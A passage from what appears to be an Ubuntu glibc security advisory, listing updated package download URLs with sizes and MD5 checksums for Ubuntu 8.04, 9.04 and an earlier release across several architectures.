Xeon&#41;:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dbg_2.3.6-0ubuntu20.6_amd64.deb\r\n Size/MD5: 4142176 d5b4976d3ad3487a4309d849d66b1d12\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev-i386_2.3.6-0ubuntu20.6_amd64.deb\r\n Size/MD5: 1350178 f1b7c0fbc5759fce5479e371c0f0d117\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev_2.3.6-0ubuntu20.6_amd64.deb\r\n Size/MD5: 2330458 18c07b45b8557f23884b705258aaf074\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-i386_2.3.6-0ubuntu20.6_amd64.deb\r\n Size/MD5: 2986676 d57f2ecb7c2177fba0872d600989106d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-pic_2.3.6-0ubuntu20.6_amd64.deb\r\n Size/MD5: 1439258 e699685adee781617370a613d6ffa261\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-prof_2.3.6-0ubuntu20.6_amd64.deb\r\n Size/MD5: 1801612 6171beff64ba97745a06bee9f0f67af0\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-udeb_2.3.6-0ubuntu20.6_amd64.udeb\r\n Size/MD5: 1071392 0fdca0be317f91aa4eb87d0a2a110dc6\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.3.6-0ubuntu20.6_amd64.deb\r\n Size/MD5: 4042158 79690404d23e644925c75e28b6435aea\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-dns-udeb_2.3.6-0ubuntu20.6_amd64.udeb\r\n Size/MD5: 9358 326e018f2da880ab06ccbb3aa9c32412\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-files-udeb_2.3.6-0ubuntu20.6_amd64.udeb\r\n Size/MD5: 18050 dd94fc601d5fb3099abc708becfc8dc4\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/g/glibc/nscd_2.3.6-0ubuntu20.6_amd64.deb\r\n Size/MD5: 140614 da3335d53109c36085713f2c676a4d1e\r\n\r\n i386 architecture &#40;x86 compatible Intel/AMD&#41;:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-amd64_2.3.6-0ubuntu20.6_i386.deb\r\n Size/MD5: 3324750 f031c74dd7985269385da48c7bdbc296\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dbg_2.3.6-0ubuntu20.6_i386.deb\r\n Size/MD5: 5555456 18098a4504477e54f8d9ddfe5703f729\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev-amd64_2.3.6-0ubuntu20.6_i386.deb\r\n Size/MD5: 2233746 9c3b54aa0c9a1caa8baa8832b4153d3f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev_2.3.6-0ubuntu20.6_i386.deb\r\n Size/MD5: 2823036 8dcd9700f5c569ea50c1a77c6af58fa7\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-i686_2.3.6-0ubuntu20.6_i386.deb\r\n Size/MD5: 1080736 01e3021d68581ad0c2bc1ea39ede96b9\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-pic_2.3.6-0ubuntu20.6_i386.deb\r\n Size/MD5: 1037776 c479d144f5d56ab4166e51d260fe1ff3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-prof_2.3.6-0ubuntu20.6_i386.deb\r\n Size/MD5: 1247448 560c254211bd57a1303c1d481b9e6071\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-udeb_2.3.6-0ubuntu20.6_i386.udeb\r\n Size/MD5: 699814 acea8cb6dca3988e1f13f6af1982d413\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.3.6-0ubuntu20.6_i386.deb\r\n Size/MD5: 4615460 b8ae65bc40c4df6d72d1e35e5b28f00c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-dns-udeb_2.3.6-0ubuntu20.6_i386.udeb\r\n Size/MD5: 8294 7393a517b72081d640d97e591228e481\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-files-udeb_2.3.6-0ubuntu20.6_i386.udeb\r\n Size/MD5: 13624 696b60f05d2b0484eb672ac55870a4d6\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/g/glibc/nscd_2.3.6-0ubuntu20.6_i386.deb\r\n Size/MD5: 134660 967249254ea2b9d81338b102a3e5fa79\r\n\r\n powerpc architecture &#40;Apple Macintosh G3/G4/G5&#41;:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dbg_2.3.6-0ubuntu20.6_powerpc.deb\r\n Size/MD5: 4653438 74bba116d0e021b4f7a81e97d7d2f637\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev-ppc64_2.3.6-0ubuntu20.6_powerpc.deb\r\n Size/MD5: 2001302 e59a2ca368ee8e8bf0e9168979594f49\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev_2.3.6-0ubuntu20.6_powerpc.deb\r\n Size/MD5: 2462616 f62d342d7fa729fc22758d273a6ec427\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-pic_2.3.6-0ubuntu20.6_powerpc.deb\r\n Size/MD5: 1477412 ad87cc42b58b24694161661d9ad406c2\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-ppc64_2.3.6-0ubuntu20.6_powerpc.deb\r\n Size/MD5: 3644848 c41ac746c3114bda650d55a9cc6ddb3e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-prof_2.3.6-0ubuntu20.6_powerpc.deb\r\n Size/MD5: 1972892 f869bfdebfae71f8a72939cc5e6f7d1b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-udeb_2.3.6-0ubuntu20.6_powerpc.udeb\r\n Size/MD5: 1149854 514d0755a1d22ccc0f317bf3bc90821d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.3.6-0ubuntu20.6_powerpc.deb\r\n Size/MD5: 4224754 db662479f0c73f1c0da94d53bc59b757\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-dns-udeb_2.3.6-0ubuntu20.6_powerpc.udeb\r\n Size/MD5: 9594 801ee50757d501d167225990206b4ce0\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-files-udeb_2.3.6-0ubuntu20.6_powerpc.udeb\r\n Size/MD5: 17688 3469b3463af366224bf854a24542720b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/g/glibc/nscd_2.3.6-0ubuntu20.6_powerpc.deb\r\n Size/MD5: 141098 1d0a8d536df9d6b67fc468f3eba960e8\r\n\r\n sparc architecture &#40;Sun SPARC/UltraSPARC&#41;:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dbg_2.3.6-0ubuntu20.6_sparc.deb\r\n Size/MD5: 6016206 2ce0f2e9f0dbe23cd16cc822c4a1de5d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev-sparc64_2.3.6-0ubuntu20.6_sparc.deb\r\n Size/MD5: 2083496 6c89777c78d52fab12427a251908953e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev_2.3.6-0ubuntu20.6_sparc.deb\r\n Size/MD5: 2544296 8e320f08eddfbf66b66111ade98975c5\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-pic_2.3.6-0ubuntu20.6_sparc.deb\r\n Size/MD5: 1500412 3aa5cbc607e69cd5efad8c40ef2dd5a3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-prof_2.3.6-0ubuntu20.6_sparc.deb\r\n Size/MD5: 2053354 ddd2a0a13c9a21789ddc85ce26534312\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-sparc64_2.3.6-0ubuntu20.6_sparc.deb\r\n Size/MD5: 3763798 b46598a3e52b652f4aff902d51400eef\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-sparc64b_2.3.6-0ubuntu20.6_sparc.deb\r\n Size/MD5: 1671018 9486205dab6d42a2afaa62e84143062f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-sparc64v_2.3.6-0ubuntu20.6_sparc.deb\r\n Size/MD5: 1669902 0fa0c2fb1b2073e0afb6610df29bb01e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-sparcv9b_2.3.6-0ubuntu20.6_sparc.deb\r\n Size/MD5: 1479834 cb59c59fc226efe1a02cc03ee9efe97f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-sparcv9v_2.3.6-0ubuntu20.6_sparc.deb\r\n Size/MD5: 1479172 9d88114f503f130c967a900a9f994435\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-udeb_2.3.6-0ubuntu20.6_sparc.udeb\r\n Size/MD5: 1161362 eef456642d706c5315d4bfab4393cfc2\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.3.6-0ubuntu20.6_sparc.deb\r\n Size/MD5: 4261770 f07336505aa3309459194afa4259242f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-dns-udeb_2.3.6-0ubuntu20.6_sparc.udeb\r\n Size/MD5: 8784 360236353a478e759f7de1f639b28fc8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-files-udeb_2.3.6-0ubuntu20.6_sparc.udeb\r\n Size/MD5: 17268 41cb00e402281b4228ea7a6b477fe42b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/g/glibc/nscd_2.3.6-0ubuntu20.6_sparc.deb\r\n Size/MD5: 139302 28d2f4a7e7b3d7815eb6d6c0a03b65b3\r\n\r\nUpdated packages for Ubuntu 8.04 LTS:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc_2.7-10ubuntu6.diff.gz\r\n Size/MD5: 802582 b904d2f296da818e9688dd86ebc7fee0\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc_2.7-10ubuntu6.dsc\r\n Size/MD5: 2373 e57824cfa0ac5ba996776e79155375b6\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc_2.7.orig.tar.gz\r\n Size/MD5: 15983612 eda64bfa0bcad46fe7d7d7fecfc23bfd\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc-doc_2.7-10ubuntu6_all.deb\r\n Size/MD5: 3474180 572645067b9f2c33015b901651b48d36\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/g/glibc/glibc-source_2.7-10ubuntu6_all.deb\r\n Size/MD5: 16585274 2c4c973637518e71a12a376adf633f2b\r\n\r\n amd64 architecture &#40;Athlon64, Opteron, EM64T Xeon&#41;:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dbg_2.7-10ubuntu6_amd64.deb\r\n Size/MD5: 5324104 339264adf704854cfcdc747e6510ab9b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev-i386_2.7-10ubuntu6_amd64.deb\r\n Size/MD5: 1493830 3789a892ae550062a0c30809ea7a9b5d\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev_2.7-10ubuntu6_amd64.deb\r\n Size/MD5: 2539086 ba79ffb8460f030485b1650b13316c5d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-i386_2.7-10ubuntu6_amd64.deb\r\n Size/MD5: 3699098 d5a6d4e2ffc66194681737a4f968b508\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-pic_2.7-10ubuntu6_amd64.deb\r\n Size/MD5: 1495844 aa2f6bd76a6697335e3a632f2275b943\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-prof_2.7-10ubuntu6_amd64.deb\r\n Size/MD5: 1973968 ab76a6436028f38fdf74fe700d079ed9\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-udeb_2.7-10ubuntu6_amd64.udeb\r\n Size/MD5: 1131978 8ca90c0840a7742cd5d3bbb1be82f7c9\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.7-10ubuntu6_amd64.deb\r\n Size/MD5: 4754846 c79a693bbb5100c481d097743469080a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-dns-udeb_2.7-10ubuntu6_amd64.udeb\r\n Size/MD5: 9850 8ce29f5906bfa4df24c523173833a901\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-files-udeb_2.7-10ubuntu6_amd64.udeb\r\n Size/MD5: 18158 95fb70f81adda39b816f099d4c6c3b8d\r\n http://security.ubuntu.com/ubuntu/pool/universe/g/glibc/nscd_2.7-10ubuntu6_amd64.deb\r\n Size/MD5: 181988 e64d46eda77fde9a55cd06c777a720d2\r\n\r\n i386 architecture &#40;x86 compatible Intel/AMD&#41;:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-amd64_2.7-10ubuntu6_i386.deb\r\n Size/MD5: 3983144 8aa7bc4e2eefc0cf9b373ffe8e57dbd3\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dbg_2.7-10ubuntu6_i386.deb\r\n Size/MD5: 5095364 83224db163d914c6904aec74817d1a37\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev-amd64_2.7-10ubuntu6_i386.deb\r\n Size/MD5: 1974410 cccce8adb942d1ba2ae6295e946218fe\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev_2.7-10ubuntu6_i386.deb\r\n Size/MD5: 3345852 74eb869500ae9baacdbb77bf13d9662b\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-i686_2.7-10ubuntu6_i386.deb\r\n Size/MD5: 1243798 d0734e24eb5a2b6b0ec986a7129f8692\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-pic_2.7-10ubuntu6_i386.deb\r\n Size/MD5: 1150536 8f6ad0dceb5e8787012f1da5a859f22a\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-prof_2.7-10ubuntu6_i386.deb\r\n Size/MD5: 1430674 bf4218d49fda33baa777ec8f005bbc25\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-udeb_2.7-10ubuntu6_i386.udeb\r\n Size/MD5: 809822 12e64fe8d5b4f1c1cb1a0309284720a0\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.7-10ubuntu6_i386.deb\r\n Size/MD5: 4307628 4dac8c744346e956f19dbb2d83ad6747\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-dns-udeb_2.7-10ubuntu6_i386.udeb\r\n Size/MD5: 8860 749f705adc0edc7dd94fcdc9e2d17080\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-files-udeb_2.7-10ubuntu6_i386.udeb\r\n Size/MD5: 14976 3fdca91ee276dca136b6549bc9ddf6b9\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/g/glibc/libc6-xen_2.7-10ubuntu6_i386.deb\r\n Size/MD5: 1247774 28811dfb780af1484c5af206767101d1\r\n http://security.ubuntu.com/ubuntu/pool/universe/g/glibc/nscd_2.7-10ubuntu6_i386.deb\r\n Size/MD5: 176232 97197c4bc3b2a72122b74f71c59b1b1a\r\n\r\n lpia architecture &#40;Low Power Intel Architecture&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-dbg_2.7-10ubuntu6_lpia.deb\r\n Size/MD5: 4691818 c5ae64d2705528a43a3ef66ed8484c6d\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-dev_2.7-10ubuntu6_lpia.deb\r\n Size/MD5: 2067172 1c35f6efd884a92fc5248e47f316d7ed\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-pic_2.7-10ubuntu6_lpia.deb\r\n Size/MD5: 1170192 d24dd2511d64e15fd7f0014b996cee28\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-prof_2.7-10ubuntu6_lpia.deb\r\n Size/MD5: 1516216 9b670b612cf86b0857b6dc19e835b2cc\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-udeb_2.7-10ubuntu6_lpia.udeb\r\n Size/MD5: 860876 901ed6e39312b5e86a54c5e504e4a5fb\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6_2.7-10ubuntu6_lpia.deb\r\n Size/MD5: 4377896 93c994a7a9eba3dba9fca8c902708674\r\n http://ports.ubuntu.com/pool/main/g/glibc/libnss-dns-udeb_2.7-10ubuntu6_lpia.udeb\r\n Size/MD5: 9272 2f1cacf543b437dfd656ddb07ad9f0c2\r\n http://ports.ubuntu.com/pool/main/g/glibc/libnss-files-udeb_2.7-10ubuntu6_lpia.udeb\r\n Size/MD5: 15280 c08122e6249a3ed38d9d42b98ab4337f\r\n http://ports.ubuntu.com/pool/universe/g/glibc/nscd_2.7-10ubuntu6_lpia.deb\r\n Size/MD5: 178520 0dd2ac7b30225b603518bbcf52e2dadb\r\n\r\n powerpc architecture &#40;Apple Macintosh G3/G4/G5&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-dbg_2.7-10ubuntu6_powerpc.deb\r\n Size/MD5: 6150670 971d453bbf4516f241e3485c9ef0a4eb\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-dev-ppc64_2.7-10ubuntu6_powerpc.deb\r\n Size/MD5: 2362578 7c21d9ebb3c40923a3d4a521f5c3d1c3\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-dev_2.7-10ubuntu6_powerpc.deb\r\n Size/MD5: 2772448 942d44f981d098034d8743a8613b5297\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-pic_2.7-10ubuntu6_powerpc.deb\r\n Size/MD5: 1571514 e3d194ad487d69818c2e54769906f2e7\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-ppc64_2.7-10ubuntu6_powerpc.deb\r\n Size/MD5: 4339676 f245d80f10dd66a8bfc4d16a74f1effc\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-prof_2.7-10ubuntu6_powerpc.deb\r\n Size/MD5: 2234400 87013a5605df086936411a07227b6330\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-udeb_2.7-10ubuntu6_powerpc.udeb\r\n Size/MD5: 1204076 eb7fb756458750c655daad4960489b72\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6_2.7-10ubuntu6_powerpc.deb\r\n Size/MD5: 4896198 5ec47bc28796c8973d3cfff9b2a9682c\r\n http://ports.ubuntu.com/pool/main/g/glibc/libnss-dns-udeb_2.7-10ubuntu6_powerpc.udeb\r\n Size/MD5: 9490 187fc4632ba68846a4902a3124cc96f5\r\n \r\nhttp://ports.ubuntu.com/pool/main/g/glibc/libnss-files-udeb_2.7-10ubuntu6_powerpc.udeb\r\n Size/MD5: 16358 1f9a425375a92864039742be33c4f99e\r\n http://ports.ubuntu.com/pool/universe/g/glibc/nscd_2.7-10ubuntu6_powerpc.deb\r\n Size/MD5: 178982 199923532e05190ab199cfc2117c46ee\r\n\r\nUpdated packages for Ubuntu 9.04:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc_2.9-4ubuntu6.2.diff.gz\r\n Size/MD5: 2682431 bbdb7b9b03bf2317af25b34e227a15f9\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc_2.9-4ubuntu6.2.dsc\r\n Size/MD5: 3067 3f5e8da051f27a1b73073eeb27e0fcaa\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc_2.9.orig.tar.gz\r\n Size/MD5: 23036779 926e90e50fe4f830575fef1c6a554768\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc-doc_2.9-4ubuntu6.2_all.deb\r\n Size/MD5: 3503532 819296b8d72e57781c4bdce1c8d73097\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/g/glibc/glibc-source_2.9-4ubuntu6.2_all.deb\r\n Size/MD5: 12417284 886bb2af0197e85e66888c9c2f233c68\r\n\r\n amd64 architecture &#40;Athlon64, Opteron, EM64T Xeon&#41;:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dbg_2.9-4ubuntu6.2_amd64.deb\r\n Size/MD5: 10452676 a0004c106622bab7a8902658ddcc18b4\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev-i386_2.9-4ubuntu6.2_amd64.deb\r\n Size/MD5: 1553172 7059151f75384b16f7616e528acd099b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev_2.9-4ubuntu6.2_amd64.deb\r\n Size/MD5: 2612710 baeb6c26bf2528e7b56f42c3d4a01da3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-i386_2.9-4ubuntu6.2_amd64.deb\r\n Size/MD5: 3706766 024fcdc84ddefc6048037b5339ee2cae\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-pic_2.9-4ubuntu6.2_amd64.deb\r\n Size/MD5: 1555548 504dbd36f4ab7889b77b9dd8c5ed581f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-prof_2.9-4ubuntu6.2_amd64.deb\r\n Size/MD5: 2045820 3c78a729fdaacce5c7782ea345326580\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-udeb_2.9-4ubuntu6.2_amd64.udeb\r\n Size/MD5: 1182542 21a4d1ba04b6a134a76e0d31e60fee4b\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.9-4ubuntu6.2_amd64.deb\r\n Size/MD5: 4952548 11f6d0c36f439c4b35097955287f01ef\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-dns-udeb_2.9-4ubuntu6.2_amd64.udeb\r\n Size/MD5: 11384 286305a2edcc2326108104592852544a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-files-udeb_2.9-4ubuntu6.2_amd64.udeb\r\n Size/MD5: 20198 852b1243b5d4c00557b3e18749b54970\r\n http://security.ubuntu.com/ubuntu/pool/universe/g/glibc/nscd_2.9-4ubuntu6.2_amd64.deb\r\n Size/MD5: 200466 08297c5ab935c702489f99d2e36c0e31\r\n\r\n i386 architecture &#40;x86 compatible Intel/AMD&#41;:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-amd64_2.9-4ubuntu6.2_i386.deb\r\n Size/MD5: 4047050 4d53539b79bdfcc1e9eed979b3101588\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dbg_2.9-4ubuntu6.2_i386.deb\r\n Size/MD5: 16784900 1213e91c228406ab86095970d1790405\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev-amd64_2.9-4ubuntu6.2_i386.deb\r\n Size/MD5: 2045540 00f9dcac4d49a1299f3a39a59bb38721\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev_2.9-4ubuntu6.2_i386.deb\r\n Size/MD5: 3454044 1b3ed11fd40fa3b94cf2a1be985ea116\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-i686_2.9-4ubuntu6.2_i386.deb\r\n Size/MD5: 1245916 fd8cc2543869ce702ce02fa112e2c57d\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-pic_2.9-4ubuntu6.2_i386.deb\r\n Size/MD5: 1194494 07740cc4b48015efb4cfb4a8325a8e03\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-prof_2.9-4ubuntu6.2_i386.deb\r\n Size/MD5: 1484748 c3b52e87d7c4d34acab64374bda33d8d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-udeb_2.9-4ubuntu6.2_i386.udeb\r\n Size/MD5: 844806 5aeb307bf38a12d12c8c34bbe6814ef8\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.9-4ubuntu6.2_i386.deb\r\n Size/MD5: 4471982 8d8eb26761ba2ba47e1bfa10e7f844af\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-dns-udeb_2.9-4ubuntu6.2_i386.udeb\r\n Size/MD5: 10096 4eac747d74a64a49b31913ec0464c599\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-files-udeb_2.9-4ubuntu6.2_i386.udeb\r\n Size/MD5: 16142 49bc6a8beb43c2e2e962752f83f39e77\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/g/glibc/libc6-xen_2.9-4ubuntu6.2_i386.deb\r\n Size/MD5: 1249692 4141fea57a1129ca26f156df70967a11\r\n http://security.ubuntu.com/ubuntu/pool/universe/g/glibc/nscd_2.9-4ubuntu6.2_i386.deb\r\n Size/MD5: 192220 463feb16a31f2ba1c0e3f36fdc479204\r\n\r\n lpia architecture &#40;Low Power Intel Architecture&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-dbg_2.9-4ubuntu6.2_lpia.deb\r\n Size/MD5: 5830896 c439aacd03624b073aa0e5c53b4e67d6\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-dev_2.9-4ubuntu6.2_lpia.deb\r\n Size/MD5: 2127690 e93d4cfd06603bb82f67f41a3425c8ca\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-pic_2.9-4ubuntu6.2_lpia.deb\r\n Size/MD5: 1222342 66d550fef636fb73df4b12ba7deb1ef8\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-prof_2.9-4ubuntu6.2_lpia.deb\r\n Size/MD5: 1570720 db1e324e20a7a761eaf8bbd7320dc3be\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-udeb_2.9-4ubuntu6.2_lpia.udeb\r\n Size/MD5: 901796 ad45e0599ee31d8aed30d8c02f8c8227\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6_2.9-4ubuntu6.2_lpia.deb\r\n Size/MD5: 4558818 001fb9626e587f9bc8b2f40a1f59d3da\r\n http://ports.ubuntu.com/pool/main/g/glibc/libnss-dns-udeb_2.9-4ubuntu6.2_lpia.udeb\r\n Size/MD5: 10516 d22a5e569e7df08ef9f8db35774a553e\r\n http://ports.ubuntu.com/pool/main/g/glibc/libnss-files-udeb_2.9-4ubuntu6.2_lpia.udeb\r\n Size/MD5: 17030 34223418278071412f3b5f1a93fbbff9\r\n http://ports.ubuntu.com/pool/universe/g/glibc/nscd_2.9-4ubuntu6.2_lpia.deb\r\n Size/MD5: 195736 048bfc2511e95114353aa04fffc9668f\r\n\r\n powerpc architecture &#40;Apple Macintosh G3/G4/G5&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-dbg_2.9-4ubuntu6.2_powerpc.deb\r\n Size/MD5: 12023960 c7502e05029dcb17479c49014b1b0d98\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-dev-ppc64_2.9-4ubuntu6.2_powerpc.deb\r\n Size/MD5: 2435370 6a06c0e13a8da8d1c4e57c687348ba67\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-dev_2.9-4ubuntu6.2_powerpc.deb\r\n Size/MD5: 2835520 0ee3d8e1e55e7e3218f793335a2e0cc4\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-pic_2.9-4ubuntu6.2_powerpc.deb\r\n Size/MD5: 1633630 2db92fcf2fe5ab99deb61176d6399935\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-ppc64_2.9-4ubuntu6.2_powerpc.deb\r\n Size/MD5: 4351012 6b6bcd0e010b06e3e0d5bd17caf35280\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-prof_2.9-4ubuntu6.2_powerpc.deb\r\n Size/MD5: 2292502 c879d92c414ac26112c0c25f66b7fa50\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-udeb_2.9-4ubuntu6.2_powerpc.udeb\r\n Size/MD5: 1238750 6937fe72b7a1d36c4b64b0ca03c1fbb1\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6_2.9-4ubuntu6.2_powerpc.deb\r\n Size/MD5: 5077372 3dbbce05eceb4c69a153a3a9c238f74b\r\n http://ports.ubuntu.com/pool/main/g/glibc/libnss-dns-udeb_2.9-4ubuntu6.2_powerpc.udeb\r\n Size/MD5: 10848 